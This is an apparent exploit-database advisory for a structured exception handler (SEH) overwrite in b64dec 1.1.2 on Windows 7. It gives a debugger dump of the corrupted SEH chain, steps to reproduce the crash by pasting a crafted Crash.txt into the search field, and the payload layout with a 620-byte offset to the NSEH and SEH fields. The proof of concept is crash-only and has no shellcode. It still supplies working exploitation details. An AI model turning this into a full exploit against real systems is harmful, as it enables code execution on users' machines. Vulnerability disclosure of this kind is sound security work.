1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 |
******************************************************************************************** # Exploit: b64dec SEH OverWrite. # Date: 12/18/2015 # Exploit Author: Un_N0n # Vendor: Tim Rohlfs # Software Link: http://4mhz.de/b64dec.html # Version: 1.1.2 # Tested on: Windows 7 x64(64bit) ******************************************************************************************** [Dump] SEH chain of thread 00000EC0 AddressSE handler 024CFC50 b64dec.00458140 024CFC5C b64dec.004581B3 024CFF28 b64dec.0045847C 024CFF00 41414141 <------- 41414141 *** CORRUPT ENTRY ***<------- ---------------------------------------------------- 024CFEE4 41414141AAAA 024CFEE8 41414141AAAA 024CFEEC 41414141AAAA 024CFEF0 41414141AAAA 024CFEF4 41414141AAAA 024CFEF8 41414141AAAA 024CFEFC 41414141AAAA 024CFF00 41414141AAAAPointer to next SEH record<----- 024CFF04 41414141AAAASE handler<----- 024CFF08 41414141AAAA 024CFF0C 41414141AAAA 024CFF10 41414141AAAA 024CFF14 41414141AAAA 024CFF18 41414141AAAA [How to?] 1 - Open up b64dec.exe 2 - In Search field, paste in the contents of Crash.txt 3 - Hit 'Decode' ~ Software Crashes due to SEH Over-Write. [Crash.txt?] AAAAAAAAAAAAAAAAAAAAAAAAAA.......620 BBBB CCCC DDDDDDDDDDDDDDDDDDD --------------------------------------|-----| NSEHSEH [Extra Info] Offset = 620 ******************************************************************************************** |